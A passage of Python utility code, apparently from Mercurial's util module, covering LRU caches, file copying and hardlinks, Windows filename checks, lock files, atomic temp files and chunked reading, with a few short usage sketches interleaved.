1324
1325 def __setitem__(self, k, v):
1326 self.insert(k, v)
1327
1328 def __delitem__(self, k):
1329 self.pop(k)
1330
1331 def pop(self, k, default=_notset):
1332 try:
1333 node = self._cache.pop(k)
1334 except KeyError:
1335 if default is _notset:
1336 raise
1337 return default
1338 value = node.value
1339 self.totalcost -= node.cost
1340 node.markempty()
1341
1342 # Temporarily mark as newest item before re-adjusting head to make
1343 # this node the oldest item.
1344 self._movetohead(node)
1345 self._head = node.next
1346
1347 return value
1348
1349 # Additional dict methods.
1350
1351 def get(self, k, default=None):
1352 try:
1353 return self.__getitem__(k)
1354 except KeyError:
1355 return default
1356
1357 def peek(self, k, default=_notset):
1358 """Get the specified item without moving it to the head
1359
1360 Unlike get(), this doesn't mutate the internal state. But be aware
1361 that this does not make peek() thread safe.
1362 """
1363 try:
1364 node = self._cache[k]
1365 return node.value
1366 except KeyError:
1367 if default is _notset:
1368 raise
1369 return default
1370
1371 def clear(self):
1372 n = self._head
1373 while n.key is not _notset:
1374 self.totalcost -= n.cost
1375 n.markempty()
1376 n = n.next
1377
1378 self._cache.clear()
1379
1380 def copy(self, capacity=None, maxcost=0):
1381 """Create a new cache as a copy of the current one.
1382
1383 By default, the new cache has the same capacity as the existing one.
1384 But, the cache capacity can be changed as part of performing the
1385 copy.
1386
1387 Items in the copy have an insertion/access order matching this
1388 instance.
1389 """
1390
1391 capacity = capacity or self.capacity
1392 maxcost = maxcost or self.maxcost
1393 result = lrucachedict(capacity, maxcost=maxcost)
1394
1395 # We copy entries by iterating in oldest-to-newest order so the copy
1396 # has the correct ordering.
1397
1398 # Find the first non-empty entry.
1399 n = self._head.prev
1400 while n.key is _notset and n is not self._head:
1401 n = n.prev
1402
1403 # We could potentially skip the first N items when decreasing capacity.
1404 # But let's keep it simple unless it is a performance problem.
1405 for i in range(len(self._cache)):
1406 result.insert(n.key, n.value, cost=n.cost)
1407 n = n.prev
1408
1409 return result
1410
1411 def popoldest(self):
1412 """Remove the oldest item from the cache.
1413
1414 Returns the (key, value) describing the removed cache entry.
1415 """
1416 if not self._cache:
1417 return
1418
1419 # Walk the linked list backwards starting at tail node until we hit
1420 # a non-empty node.
1421 n = self._head.prev
1422 while n.key is _notset:
1423 n = n.prev
1424
1425 key, value = n.key, n.value
1426
1427 # And remove it from the cache and mark it as empty.
1428 del self._cache[n.key]
1429 self.totalcost -= n.cost
1430 n.markempty()
1431
1432 return key, value
1433
1434 def _movetohead(self, node):
1435 """Mark a node as the newest, making it the new head.
1436
1437 When a node is accessed, it becomes the freshest entry in the LRU
1438 list, which is denoted by self._head.
1439
1440 Visually, let's make ``N`` the new head node (* denotes head):
1441
1442 previous/oldest <-> head <-> next/next newest
1443
1444 ----<->--- A* ---<->-----
1445 | |
1446 E <-> D <-> N <-> C <-> B
1447
1448 To:
1449
1450 ----<->--- N* ---<->-----
1451 | |
1452 E <-> D <-> C <-> B <-> A
1453
1454 This requires the following moves:
1455
1456 C.next = D (node.prev.next = node.next)
1457 D.prev = C (node.next.prev = node.prev)
1458 E.next = N (head.prev.next = node)
1459 N.prev = E (node.prev = head.prev)
1460 N.next = A (node.next = head)
1461 A.prev = N (head.prev = node)
1462 """
1463 head = self._head
1464 # C.next = D
1465 node.prev.next = node.next
1466 # D.prev = C
1467 node.next.prev = node.prev
1468 # N.prev = E
1469 node.prev = head.prev
1470 # N.next = A
1471 # It is tempting to do just "head" here, however if node is
1472 # adjacent to head, this will do bad things.
1473 node.next = head.prev.next
1474 # E.next = N
1475 node.next.prev = node
1476 # A.prev = N
1477 node.prev.next = node
1478
1479 self._head = node
1480
1481 def _addcapacity(self):
1482 """Add a node to the circular linked list.
1483
1484 The new node is inserted before the head node.
1485 """
1486 head = self._head
1487 node = _lrucachenode()
1488 head.prev.next = node
1489 node.prev = head.prev
1490 node.next = head
1491 head.prev = node
1492 self._size += 1
1493 return node
1494
1495 def _enforcecostlimit(self):
1496 # This should run after an insertion. It should only be called if total
1497 # cost limits are being enforced.
1498 # The most recently inserted node is never evicted.
1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1500 return
1501
1502 # This is logically equivalent to calling popoldest() until we
1503 # free up enough cost. We don't do that since popoldest() needs
1504 # to walk the linked list and doing this in a loop would be
1505 # quadratic. So we find the first non-empty node and then
1506 # walk nodes until we free up enough capacity.
1507 #
1508 # If we only removed the minimum number of nodes to free enough
1509 # cost at insert time, chances are high that the next insert would
1510 # also require pruning. This would effectively constitute quadratic
1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1512 # target cost that is a percentage of the max cost. This will tend
1513 # to free more nodes when the high water mark is reached, which
1514 # lowers the chances of needing to prune on the subsequent insert.
1515 targetcost = int(self.maxcost * 0.75)
1516
1517 n = self._head.prev
1518 while n.key is _notset:
1519 n = n.prev
1520
1521 while len(self) > 1 and self.totalcost > targetcost:
1522 del self._cache[n.key]
1523 self.totalcost -= n.cost
1524 n.markempty()
1525 n = n.prev
1526
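A usage sketch with invented costs, tracing the eviction rule described above: once an insert pushes totalcost past maxcost, old nodes are dropped until the total falls to roughly 75% of the limit.

d = lrucachedict(4, maxcost=100)
d.insert('a', 'small', cost=10)
d.insert('b', 'large', cost=90)    # totalcost is now exactly 100
d.insert('c', 'more', cost=20)     # 120 > maxcost triggers eviction
assert list(d) == ['c']            # 'a' and 'b' were both evicted
assert d.totalcost == 20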
1527 def lrucachefunc(func):
1528 '''cache most recent results of function calls'''
1529 cache = {}
1530 order = collections.deque()
1531 if func.__code__.co_argcount == 1:
1532 def f(arg):
1533 if arg not in cache:
1534 if len(cache) > 20:
1535 del cache[order.popleft()]
1536 cache[arg] = func(arg)
1537 else:
1538 order.remove(arg)
1539 order.append(arg)
1540 return cache[arg]
1541 else:
1542 def f(*args):
1543 if args not in cache:
1544 if len(cache) > 20:
1545 del cache[order.popleft()]
1546 cache[args] = func(*args)
1547 else:
1548 order.remove(args)
1549 order.append(args)
1550 return cache[args]
1551
1552 return f
1553
1554 class propertycache(object):
1555 def __init__(self, func):
@@ -1564,1657 +46,6 b' class propertycache(object):'
1564 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1565 obj.__dict__[self.name] = value
1566
1567 def clearcachedproperty(obj, prop):
1568 '''clear a cached property value, if one has been set'''
1569 prop = pycompat.sysstr(prop)
1570 if prop in obj.__dict__:
1571 del obj.__dict__[prop]
1572
1573 def increasingchunks(source, min=1024, max=65536):
1574 '''return no less than min bytes per chunk while data remains,
1575 doubling min after each chunk until it reaches max'''
1576 def log2(x):
1577 if not x:
1578 return 0
1579 i = 0
1580 while x:
1581 x >>= 1
1582 i += 1
1583 return i - 1
1584
1585 buf = []
1586 blen = 0
1587 for chunk in source:
1588 buf.append(chunk)
1589 blen += len(chunk)
1590 if blen >= min:
1591 if min < max:
1592 min = min << 1
1593 nmin = 1 << log2(blen)
1594 if nmin > min:
1595 min = nmin
1596 if min > max:
1597 min = max
1598 yield ''.join(buf)
1599 blen = 0
1600 buf = []
1601 if buf:
1602 yield ''.join(buf)
1603
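Tracing the doubling rule by hand on invented input: 5000 bytes arriving in 100-byte pieces come out as three chunks, the threshold doubling from 1024 to 2048 to 4096 along the way.

chunks = [b'x' * 100] * 50
out = list(increasingchunks(chunks))           # default min=1024
assert [len(c) for c in out] == [1100, 2100, 1800]
assert b''.join(out) == b''.join(chunks)       # data is unchanged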
1604 def always(fn):
1605 return True
1606
1607 def never(fn):
1608 return False
1609
1610 def nogc(func):
1611 """disable garbage collector
1612
1613 Python's garbage collector triggers a GC each time a certain number of
1614 container objects (the number being defined by gc.get_threshold()) are
1615 allocated even when marked not to be tracked by the collector. Tracking has
1616 no effect on when GCs are triggered, only on what objects the GC looks
1617 into. As a workaround, disable GC while building complex (huge)
1618 containers.
1619
1620 This garbage collector issue has been fixed in 2.7. But it still affects
1621 CPython's performance.
1622 """
1623 def wrapper(*args, **kwargs):
1624 gcenabled = gc.isenabled()
1625 gc.disable()
1626 try:
1627 return func(*args, **kwargs)
1628 finally:
1629 if gcenabled:
1630 gc.enable()
1631 return wrapper
1632
1633 if pycompat.ispypy:
1634 # PyPy runs slower with gc disabled
1635 nogc = lambda x: x
1636
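Typical use is as a decorator around code that builds one big container (the `buildmap` function is hypothetical):

@nogc
def buildmap(items):
    # construct a huge dict without GC passes over the intermediates
    return dict((i, True) for i in items)

m = buildmap(range(100000))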
1637 def pathto(root, n1, n2):
1638 '''return the relative path from one place to another.
1639 root should use os.sep to separate directories
1640 n1 should use os.sep to separate directories
1641 n2 should use "/" to separate directories
1642 returns an os.sep-separated path.
1643
1644 If n1 is a relative path, it's assumed it's
1645 relative to root.
1646 n2 should always be relative to root.
1647 '''
1648 if not n1:
1649 return localpath(n2)
1650 if os.path.isabs(n1):
1651 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1652 return os.path.join(root, localpath(n2))
1653 n2 = '/'.join((pconvert(root), n2))
1654 a, b = splitpath(n1), n2.split('/')
1655 a.reverse()
1656 b.reverse()
1657 while a and b and a[-1] == b[-1]:
1658 a.pop()
1659 b.pop()
1660 b.reverse()
1661 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1662
1663 # the location of data files matching the source code
1664 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1665 # executable version (py2exe) doesn't support __file__
1666 datapath = os.path.dirname(pycompat.sysexecutable)
1667 else:
1668 datapath = os.path.dirname(pycompat.fsencode(__file__))
1669
1670 i18n.setdatapath(datapath)
1671
1672 def checksignature(func):
1673 '''wrap a function with code to check for calling errors'''
1674 def check(*args, **kwargs):
1675 try:
1676 return func(*args, **kwargs)
1677 except TypeError:
1678 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1679 raise error.SignatureError
1680 raise
1681
1682 return check
1683
1684 # a whitelist of known filesystems where hardlink works reliably
1685 _hardlinkfswhitelist = {
1686 'apfs',
1687 'btrfs',
1688 'ext2',
1689 'ext3',
1690 'ext4',
1691 'hfs',
1692 'jfs',
1693 'NTFS',
1694 'reiserfs',
1695 'tmpfs',
1696 'ufs',
1697 'xfs',
1698 'zfs',
1699 }
1700
1701 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1702 '''copy a file, preserving mode and optionally other stat info like
1703 atime/mtime
1704
1705 checkambig argument is used with filestat, and is useful only if
1706 destination file is guarded by any lock (e.g. repo.lock or
1707 repo.wlock).
1708
1709 copystat and checkambig should be exclusive.
1710 '''
1711 assert not (copystat and checkambig)
1712 oldstat = None
1713 if os.path.lexists(dest):
1714 if checkambig:
1715 oldstat = checkambig and filestat.frompath(dest)
1716 unlink(dest)
1717 if hardlink:
1718 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1719 # unless we are confident that dest is on a whitelisted filesystem.
1720 try:
1721 fstype = getfstype(os.path.dirname(dest))
1722 except OSError:
1723 fstype = None
1724 if fstype not in _hardlinkfswhitelist:
1725 hardlink = False
1726 if hardlink:
1727 try:
1728 oslink(src, dest)
1729 return
1730 except (IOError, OSError):
1731 pass # fall back to normal copy
1732 if os.path.islink(src):
1733 os.symlink(os.readlink(src), dest)
1734 # copytime is ignored for symlinks, but in general copytime isn't needed
1735 # for them anyway
1736 else:
1737 try:
1738 shutil.copyfile(src, dest)
1739 if copystat:
1740 # copystat also copies mode
1741 shutil.copystat(src, dest)
1742 else:
1743 shutil.copymode(src, dest)
1744 if oldstat and oldstat.stat:
1745 newstat = filestat.frompath(dest)
1746 if newstat.isambig(oldstat):
1747 # stat of copied file is ambiguous to original one
1748 advanced = (
1749 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1750 os.utime(dest, (advanced, advanced))
1751 except shutil.Error as inst:
1752 raise error.Abort(str(inst))
1753
1754 def copyfiles(src, dst, hardlink=None, progress=None):
1755 """Copy a directory tree using hardlinks if possible."""
1756 num = 0
1757
1758 def settopic():
1759 if progress:
1760 progress.topic = _('linking') if hardlink else _('copying')
1761
1762 if os.path.isdir(src):
1763 if hardlink is None:
1764 hardlink = (os.stat(src).st_dev ==
1765 os.stat(os.path.dirname(dst)).st_dev)
1766 settopic()
1767 os.mkdir(dst)
1768 for name, kind in listdir(src):
1769 srcname = os.path.join(src, name)
1770 dstname = os.path.join(dst, name)
1771 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1772 num += n
1773 else:
1774 if hardlink is None:
1775 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1776 os.stat(os.path.dirname(dst)).st_dev)
1777 settopic()
1778
1779 if hardlink:
1780 try:
1781 oslink(src, dst)
1782 except (IOError, OSError):
1783 hardlink = False
1784 shutil.copy(src, dst)
1785 else:
1786 shutil.copy(src, dst)
1787 num += 1
1788 if progress:
1789 progress.increment()
1790
1791 return hardlink, num
1792
1793 _winreservednames = {
1794 'con', 'prn', 'aux', 'nul',
1795 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1796 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1797 }
1798 _winreservedchars = ':*?"<>|'
1799 def checkwinfilename(path):
1800 r'''Check that the base-relative path is a valid filename on Windows.
1801 Returns None if the path is ok, or a UI string describing the problem.
1802
1803 >>> checkwinfilename(b"just/a/normal/path")
1804 >>> checkwinfilename(b"foo/bar/con.xml")
1805 "filename contains 'con', which is reserved on Windows"
1806 >>> checkwinfilename(b"foo/con.xml/bar")
1807 "filename contains 'con', which is reserved on Windows"
1808 >>> checkwinfilename(b"foo/bar/xml.con")
1809 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1810 "filename contains 'AUX', which is reserved on Windows"
1811 >>> checkwinfilename(b"foo/bar/bla:.txt")
1812 "filename contains ':', which is reserved on Windows"
1813 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1814 "filename contains '\\x07', which is invalid on Windows"
1815 >>> checkwinfilename(b"foo/bar/bla ")
1816 "filename ends with ' ', which is not allowed on Windows"
1817 >>> checkwinfilename(b"../bar")
1818 >>> checkwinfilename(b"foo\\")
1819 "filename ends with '\\', which is invalid on Windows"
1820 >>> checkwinfilename(b"foo\\/bar")
1821 "directory name ends with '\\', which is invalid on Windows"
1822 '''
1823 if path.endswith('\\'):
1824 return _("filename ends with '\\', which is invalid on Windows")
1825 if '\\/' in path:
1826 return _("directory name ends with '\\', which is invalid on Windows")
1827 for n in path.replace('\\', '/').split('/'):
1828 if not n:
1829 continue
1830 for c in _filenamebytestr(n):
1831 if c in _winreservedchars:
1832 return _("filename contains '%s', which is reserved "
1833 "on Windows") % c
1834 if ord(c) <= 31:
1835 return _("filename contains '%s', which is invalid "
1836 "on Windows") % stringutil.escapestr(c)
1837 base = n.split('.')[0]
1838 if base and base.lower() in _winreservednames:
1839 return _("filename contains '%s', which is reserved "
1840 "on Windows") % base
1841 t = n[-1:]
1842 if t in '. ' and n not in '..':
1843 return _("filename ends with '%s', which is not allowed "
1844 "on Windows") % t
1845
1846 if pycompat.iswindows:
1847 checkosfilename = checkwinfilename
1848 timer = time.clock
1849 else:
1850 checkosfilename = platform.checkosfilename
1851 timer = time.time
1852
1853 if safehasattr(time, "perf_counter"):
1854 timer = time.perf_counter
1855
1856 def makelock(info, pathname):
1857 """Create a lock file atomically if possible
1858
1859 This may leave a stale lock file if symlink isn't supported and signal
1860 interrupt is enabled.
1861 """
1862 try:
1863 return os.symlink(info, pathname)
1864 except OSError as why:
1865 if why.errno == errno.EEXIST:
1866 raise
1867 except AttributeError: # no symlink in os
1868 pass
1869
1870 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1871 ld = os.open(pathname, flags)
1872 os.write(ld, info)
1873 os.close(ld)
1874
1875 def readlock(pathname):
1876 try:
1877 return readlink(pathname)
1878 except OSError as why:
1879 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1880 raise
1881 except AttributeError: # no symlink in os
1882 pass
1883 with posixfile(pathname, 'rb') as fp:
1884 return fp.read()
1885
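A round-trip sketch (lock path and contents invented; assumes a platform where either symlinks or O_EXCL file creation behave as described above):

import os, tempfile

lockname = os.path.join(tempfile.mkdtemp(), 'lock')
makelock('pid:1234', lockname)
assert readlock(lockname) == 'pid:1234'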
1886 def fstat(fp):
1887 '''stat file object that may not have fileno method.'''
1888 try:
1889 return os.fstat(fp.fileno())
1890 except AttributeError:
1891 return os.stat(fp.name)
1892
1893 # File system features
1894
1895 def fscasesensitive(path):
1896 """
1897 Return true if the given path is on a case-sensitive filesystem
1898
1899 Requires a path (like /foo/.hg) ending with a foldable final
1900 directory component.
1901 """
1902 s1 = os.lstat(path)
1903 d, b = os.path.split(path)
1904 b2 = b.upper()
1905 if b == b2:
1906 b2 = b.lower()
1907 if b == b2:
1908 return True # no evidence against case sensitivity
1909 p2 = os.path.join(d, b2)
1910 try:
1911 s2 = os.lstat(p2)
1912 if s2 == s1:
1913 return False
1914 return True
1915 except OSError:
1916 return True
1917
1918 try:
1919 import re2
1920 _re2 = None
1921 except ImportError:
1922 _re2 = False
1923
1924 class _re(object):
1925 def _checkre2(self):
1926 global _re2
1927 try:
1928 # check if match works, see issue3964
1929 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1930 except ImportError:
1931 _re2 = False
1932
1933 def compile(self, pat, flags=0):
1934 '''Compile a regular expression, using re2 if possible
1935
1936 For best performance, use only re2-compatible regexp features. The
1937 only flags from the re module that are re2-compatible are
1938 IGNORECASE and MULTILINE.'''
1939 if _re2 is None:
1940 self._checkre2()
1941 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1942 if flags & remod.IGNORECASE:
1943 pat = '(?i)' + pat
1944 if flags & remod.MULTILINE:
1945 pat = '(?m)' + pat
1946 try:
1947 return re2.compile(pat)
1948 except re2.error:
1949 pass
1950 return remod.compile(pat, flags)
1951
1952 @propertycache
1953 def escape(self):
1954 '''Return the version of escape corresponding to self.compile.
1955
1956 This is imperfect because whether re2 or re is used for a particular
1957 function depends on the flags, etc, but it's the best we can do.
1958 '''
1959 global _re2
1960 if _re2 is None:
1961 self._checkre2()
1962 if _re2:
1963 return re2.escape
1964 else:
1965 return remod.escape
1966
1967 re = _re()
1968
1969 _fspathcache = {}
1970 def fspath(name, root):
1971 '''Get name in the case stored in the filesystem
1972
1973 The name should be relative to root, and be normcase-ed for efficiency.
1974
1975 Note that this function is unnecessary, and should not be
1976 called, for case-sensitive filesystems (simply because it's expensive).
1977
1978 The root should be normcase-ed, too.
1979 '''
1980 def _makefspathcacheentry(dir):
1981 return dict((normcase(n), n) for n in os.listdir(dir))
1982
1983 seps = pycompat.ossep
1984 if pycompat.osaltsep:
1985 seps = seps + pycompat.osaltsep
1986 # Protect backslashes. This gets silly very quickly.
1987 seps.replace('\\','\\\\')
1988 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1989 dir = os.path.normpath(root)
1990 result = []
1991 for part, sep in pattern.findall(name):
1992 if sep:
1993 result.append(sep)
1994 continue
1995
1996 if dir not in _fspathcache:
1997 _fspathcache[dir] = _makefspathcacheentry(dir)
1998 contents = _fspathcache[dir]
1999
2000 found = contents.get(part)
2001 if not found:
2002 # retry "once per directory" per "dirstate.walk" which
2003 # may take place for each patch of "hg qpush", for example
2004 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2005 found = contents.get(part)
2006
2007 result.append(found or part)
2008 dir = os.path.join(dir, part)
2009
2010 return ''.join(result)
2011
2012 def checknlink(testfile):
2013 '''check whether hardlink count reporting works properly'''
2014
2015 # testfile may be open, so we need a separate file for checking to
2016 # work around issue2543 (or testfile may get lost on Samba shares)
2017 f1, f2, fp = None, None, None
2018 try:
2019 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2020 suffix='1~', dir=os.path.dirname(testfile))
2021 os.close(fd)
2022 f2 = '%s2~' % f1[:-2]
2023
2024 oslink(f1, f2)
2025 # nlinks() may behave differently for files on Windows shares if
2026 # the file is open.
2027 fp = posixfile(f2)
2028 return nlinks(f2) > 1
2029 except OSError:
2030 return False
2031 finally:
2032 if fp is not None:
2033 fp.close()
2034 for f in (f1, f2):
2035 try:
2036 if f is not None:
2037 os.unlink(f)
2038 except OSError:
2039 pass
2040
2041 def endswithsep(path):
2042 '''Check path ends with os.sep or os.altsep.'''
2043 return (path.endswith(pycompat.ossep)
2044 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2045
2046 def splitpath(path):
2047 '''Split path by os.sep.
2048 Note that this function does not use os.altsep because this is
2049 an alternative to a simple "xxx.split(os.sep)".
2050 It is recommended to use os.path.normpath() before using this
2051 function if needed.'''
2052 return path.split(pycompat.ossep)
2053
2054 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2055 """Create a temporary file with the same contents from name
2056
2057 The permission bits are copied from the original file.
2058
2059 If the temporary file is going to be truncated immediately, you
2060 can use emptyok=True as an optimization.
2061
2062 Returns the name of the temporary file.
2063 """
2064 d, fn = os.path.split(name)
2065 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2066 os.close(fd)
2067 # Temporary files are created with mode 0600, which is usually not
2068 # what we want. If the original file already exists, just copy
2069 # its mode. Otherwise, manually obey umask.
2070 copymode(name, temp, createmode, enforcewritable)
2071
2072 if emptyok:
2073 return temp
2074 try:
2075 try:
2076 ifp = posixfile(name, "rb")
2077 except IOError as inst:
2078 if inst.errno == errno.ENOENT:
2079 return temp
2080 if not getattr(inst, 'filename', None):
2081 inst.filename = name
2082 raise
2083 ofp = posixfile(temp, "wb")
2084 for chunk in filechunkiter(ifp):
2085 ofp.write(chunk)
2086 ifp.close()
2087 ofp.close()
2088 except: # re-raises
2089 try:
2090 os.unlink(temp)
2091 except OSError:
2092 pass
2093 raise
2094 return temp
2095
2096 class filestat(object):
2097 """help to exactly detect change of a file
2098
2099 'stat' attribute is result of 'os.stat()' if specified 'path'
2100 exists. Otherwise, it is None. This can avoid preparative
2101 'exists()' examination on client side of this class.
2102 """
2103 def __init__(self, stat):
2104 self.stat = stat
2105
2106 @classmethod
2107 def frompath(cls, path):
2108 try:
2109 stat = os.stat(path)
2110 except OSError as err:
2111 if err.errno != errno.ENOENT:
2112 raise
2113 stat = None
2114 return cls(stat)
2115
2116 @classmethod
2117 def fromfp(cls, fp):
2118 stat = os.fstat(fp.fileno())
2119 return cls(stat)
2120
2121 __hash__ = object.__hash__
2122
2123 def __eq__(self, old):
2124 try:
2125 # if ambiguity between stat of new and old file is
2126 # avoided, comparison of size, ctime and mtime is enough
2127 # to exactly detect change of a file regardless of platform
2128 return (self.stat.st_size == old.stat.st_size and
2129 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2130 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2131 except AttributeError:
2132 pass
2133 try:
2134 return self.stat is None and old.stat is None
2135 except AttributeError:
2136 return False
2137
2138 def isambig(self, old):
2139 """Examine whether new (= self) stat is ambiguous against old one
2140
2141 "S[N]" below means stat of a file at N-th change:
2142
2143 - S[n-1].ctime < S[n].ctime: can detect change of a file
2144 - S[n-1].ctime == S[n].ctime
2145 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2146 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2147 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2148 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2149
2150 Case (*2) above means that a file was changed twice or more at
2151 the same second (= S[n-1].ctime), and comparison of timestamps
2152 is ambiguous.
2153
2154 The basic idea to avoid such ambiguity is "advance mtime 1 sec, if
2155 timestamp is ambiguous".
2156
2157 But advancing mtime only in case (*2) doesn't work as
2158 expected, because naturally advanced S[n].mtime in case (*1)
2159 might be equal to manually advanced S[n-1 or earlier].mtime.
2160
2161 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2162 treated as ambiguous regardless of mtime, to avoid overlooking
2163 changes masked by collisions between such mtimes.
2164
2165 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2166 S[n].mtime", even if size of a file isn't changed.
2167 """
2168 try:
2169 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2170 except AttributeError:
2171 return False
2172
2173 def avoidambig(self, path, old):
2174 """Change file stat of specified path to avoid ambiguity
2175
2176 'old' should be previous filestat of 'path'.
2177
2178 This skips avoiding ambiguity, if a process doesn't have
2179 appropriate privileges for 'path'. This returns False in this
2180 case.
2181
2182 Otherwise, this returns True, as "ambiguity is avoided".
2183 """
2184 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2185 try:
2186 os.utime(path, (advanced, advanced))
2187 except OSError as inst:
2188 if inst.errno == errno.EPERM:
2189 # utime() on the file created by another user causes EPERM,
2190 # if a process doesn't have appropriate privileges
2191 return False
2192 raise
2193 return True
2194
2195 def __ne__(self, other):
2196 return not self == other
2197
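The calling pattern the docstrings above describe, as a runnable sketch (the temp file is invented; writefile is defined later in this module): take a stat before and after rewriting a file, and advance mtime whenever the two are ambiguous.

import os, tempfile

fd, path = tempfile.mkstemp()
os.close(fd)
writefile(path, 'one')
oldstat = filestat.frompath(path)
writefile(path, 'two')                 # may land in the same second
newstat = filestat.frompath(path)
if newstat.isambig(oldstat):
    # same ctime as before: push mtime one second ahead so the new
    # contents cannot be mistaken for the old ones
    newstat.avoidambig(path, oldstat)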
2198 class atomictempfile(object):
2199 '''writable file object that atomically updates a file
2200
2201 All writes will go to a temporary copy of the original file. Call
2202 close() when you are done writing, and atomictempfile will rename
2203 the temporary copy to the original name, making the changes
2204 visible. If the object is destroyed without being closed, all your
2205 writes are discarded.
2206
2207 checkambig argument of constructor is used with filestat, and is
2208 useful only if target file is guarded by any lock (e.g. repo.lock
2209 or repo.wlock).
2210 '''
2211 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2212 self.__name = name # permanent name
2213 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2214 createmode=createmode,
2215 enforcewritable=('w' in mode))
2216
2217 self._fp = posixfile(self._tempname, mode)
2218 self._checkambig = checkambig
2219
2220 # delegated methods
2221 self.read = self._fp.read
2222 self.write = self._fp.write
2223 self.seek = self._fp.seek
2224 self.tell = self._fp.tell
2225 self.fileno = self._fp.fileno
2226
2227 def close(self):
2228 if not self._fp.closed:
2229 self._fp.close()
2230 filename = localpath(self.__name)
2231 oldstat = self._checkambig and filestat.frompath(filename)
2232 if oldstat and oldstat.stat:
2233 rename(self._tempname, filename)
2234 newstat = filestat.frompath(filename)
2235 if newstat.isambig(oldstat):
2236 # stat of changed file is ambiguous to original one
2237 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2238 os.utime(filename, (advanced, advanced))
2239 else:
2240 rename(self._tempname, filename)
2241
2242 def discard(self):
2243 if not self._fp.closed:
2244 try:
2245 os.unlink(self._tempname)
2246 except OSError:
2247 pass
2248 self._fp.close()
2249
2250 def __del__(self):
2251 if safehasattr(self, '_fp'): # constructor actually did something
2252 self.discard()
2253
2254 def __enter__(self):
2255 return self
2256
2257 def __exit__(self, exctype, excvalue, traceback):
2258 if exctype is not None:
2259 self.discard()
2260 else:
2261 self.close()
2262
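Usage sketch (the file name is invented): because all writes land in a temporary copy, 'demo.conf' either keeps its old contents or appears fully written, never half of each; the rename happens in close(), which the context manager runs on a clean exit.

with atomictempfile('demo.conf', 'wb') as fp:
    fp.write('[section]\n')
    fp.write('key = value\n')
# an exception inside the block would have discarded the temp copy
# and left 'demo.conf' untouched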
2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2264 """unlink and remove the directory if it is empty"""
2265 if ignoremissing:
2266 tryunlink(f)
2267 else:
2268 unlink(f)
2269 if rmdir:
2270 # try removing directories that might now be empty
2271 try:
2272 removedirs(os.path.dirname(f))
2273 except OSError:
2274 pass
2275
2276 def tryunlink(f):
2277 """Attempt to remove a file, ignoring ENOENT errors."""
2278 try:
2279 unlink(f)
2280 except OSError as e:
2281 if e.errno != errno.ENOENT:
2282 raise
2283
2284 def makedirs(name, mode=None, notindexed=False):
2285 """recursive directory creation with parent mode inheritance
2286
2287 Newly created directories are marked as "not to be indexed by
2288 the content indexing service", if ``notindexed`` is specified
2289 for "write" mode access.
2290 """
2291 try:
2292 makedir(name, notindexed)
2293 except OSError as err:
2294 if err.errno == errno.EEXIST:
2295 return
2296 if err.errno != errno.ENOENT or not name:
2297 raise
2298 parent = os.path.dirname(os.path.abspath(name))
2299 if parent == name:
2300 raise
2301 makedirs(parent, mode, notindexed)
2302 try:
2303 makedir(name, notindexed)
2304 except OSError as err:
2305 # Catch EEXIST to handle races
2306 if err.errno == errno.EEXIST:
2307 return
2308 raise
2309 if mode is not None:
2310 os.chmod(name, mode)
2311
2312 def readfile(path):
2313 with open(path, 'rb') as fp:
2314 return fp.read()
2315
2316 def writefile(path, text):
2317 with open(path, 'wb') as fp:
2318 fp.write(text)
2319
2320 def appendfile(path, text):
2321 with open(path, 'ab') as fp:
2322 fp.write(text)
2323
2324 class chunkbuffer(object):
2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2326 iterator over chunks of arbitrary size."""
2327
2328 def __init__(self, in_iter):
2329 """in_iter is the iterator that's iterating over the input chunks."""
2330 def splitbig(chunks):
2331 for chunk in chunks:
2332 if len(chunk) > 2**20:
2333 pos = 0
2334 while pos < len(chunk):
2335 end = pos + 2 ** 18
2336 yield chunk[pos:end]
2337 pos = end
2338 else:
2339 yield chunk
2340 self.iter = splitbig(in_iter)
2341 self._queue = collections.deque()
2342 self._chunkoffset = 0
2343
2344 def read(self, l=None):
2345 """Read L bytes of data from the iterator of chunks of data.
